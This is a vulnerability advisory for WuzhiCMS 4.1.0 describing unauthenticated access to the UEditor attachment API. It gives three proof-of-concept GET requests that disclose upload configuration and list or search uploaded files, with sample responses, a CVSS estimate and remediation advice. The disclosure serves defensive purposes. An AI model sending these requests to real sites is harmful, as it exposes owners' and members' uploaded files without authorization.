| विवरण | WuzhiCMS 4.1.0 — Unauthorized Attachment API Access
Field Value
Vendor WuzhiCMS / 五指 CMS
Product WuzhiCMS
Version 4.1.0 (and likely earlier)
Type Information Disclosure / Missing Authorization
CWE CWE-200, CWE-862
Authentication None (unauthenticated)
Proof of Concept
PoC-1 — UEditor config (no Cookie header):
GET /index.php?m=attachment&f=index&v=upload&action=config HTTP/1.1Host: TARGETAccept: application/json, text/plain, */*Connection: close
Verified response excerpt (WuzhiCMS 4.1.0, Docker, 2026-05-29):
{"imageActionName":"uploadimage","imageMaxSize":2048000, "imageAllowFiles":[".png",".jpg",".jpeg",".gif",".bmp"], "fileMaxSize":51200000, "fileAllowFiles":[".png",".jpg",".jpeg",".gif",".bmp",".flv",".swf", ".mkv",".avi",".rm",".rmvb",".mpeg",".mpg",".ogg",".ogv",".mov", ".wmv",".mp4",".webm",".mp3",".wav",".mid",".rar",".zip",".tar", ".gz",".7z",".bz2",".cab",".iso",".doc",".docx",".xls",".xlsx", ".ppt",".pptx",".pdf",".txt",".md",".xml"], "catchRemoteImageEnable":true, "catcherLocalDomain":["127.0.0.1","localhost","img.baidu.com"], "imagePathFormat":"{yyyy}/{mm}/{dd}/{time}{rand:6}", ...}
PoC-2 — List attachments:
GET /index.php?m=attachment&f=index&v=upload&action=listimage&start=0&size=5 HTTP/1.1Host: TARGETAccept: application/json, text/plain, */*Connection: close
Verified response (clean install):
{"state":"SUCCESS","list":[],"start":1,"total":"0"}
Example with data (populated site):
{"state":"SUCCESS","list":[ {"url":"http://TARGET/uploadfile/2015/05/201505131018344338.png", "mtime":1431483515,"title":"demo"}],"start":1,"total":"42"}
PoC-3 — Keyword search (still unauthenticated):
GET /index.php?m=attachment&f=index&v=upload&action=listimage&start=0&size=50&q=invoice HTTP/1.1Host: TARGETConnection: close
Impact
Attachment enumeration — Direct URLs and filenames for all uploaded content (member uploads, admin media, documents).
Configuration disclosure — Allowed extensions, size limits, storage path templates, remote-fetch settings aid follow-on attacks.
No privileges — Network-reachable, no cookies, no user interaction.
CVSS 3.1 (estimate): AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N (~5.3 Medium on sites storing sensitive files)
Not a duplicate of
— Requires &callback= parameter; reflected script execution, not data enumeration.
Generic Baidu UEditor CVEs — This is WuzhiCMS-specific missing auth wrapper on attachment/index.php.
Remediation
Require valid member or admin session at the start of upload() before handling any action.
Scope lists() queries to the authenticated user's username (or equivalent ownership column).
Restrict action=config to authenticated editors only, or serve a minimal public config.
References
Verified on WuzhiCMS 4.1.0 (2026-05-29)
Vulnerable code: coreframe/app/attachment/index.php:26-67, ueditor.class.php:172-201
Full PoC report: POC_VERIFICATION_REPORT.md §7 |
|---|